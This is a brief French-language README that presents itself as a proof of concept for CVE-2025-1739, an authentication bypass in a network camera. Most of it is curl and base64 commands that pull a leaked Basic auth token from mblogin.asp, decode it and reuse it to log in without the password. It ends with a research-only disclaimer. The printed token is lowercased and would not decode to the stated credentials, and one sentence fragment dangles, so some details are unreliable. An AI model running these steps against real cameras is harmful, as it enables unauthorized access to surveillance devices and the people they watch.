
0day PoC for CVE-2025-1739
| CVE | CVSS v3.1 | Score | CWE | Type |
|---|---|---|---|---|
| CVE-2025-1739 | AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N | 7.1 | CWE-288 | Contournement d'authentification par fuite d'authentification Basic |
La caméra divulgue un jeton d'authentification Basic valide encodé en Base64 via le point d'accès mblogin.asp. Ce jeton peut être trivialement décodé et réutilisé pour obtenir un accès non autorisé à l'appareil — aucune connaissance du mot de passe requise.
curl -u admin:whatever http://<CAMERA_IP>:<PORT> --request-target en/mobile/mblogin.asp
La réponse contient un jeton d'authentification Basic valide :
ywrtaw46vw5ndwvzc2fibguxmjmh
echo "ywrtaw46vw5ndwvzc2fibguxmjmh" | base64 -d
# Sortie : admin:unguessable123!
curl -H "Authorization: Basic ywrtaw46vw5ndwvzc2fibguxmjmh" http://<CAMERA_IP>:<PORT>/
activex_pal.asp et mblogin.asp.Ce dépôt est destiné uniquement à des fins de recherche en sécurité éducative et autorisée. Les auteurs ne sont pas responsables d'une mauvaise utilisation. Obtenez toujours une autorisation explicite avant de tester un appareil.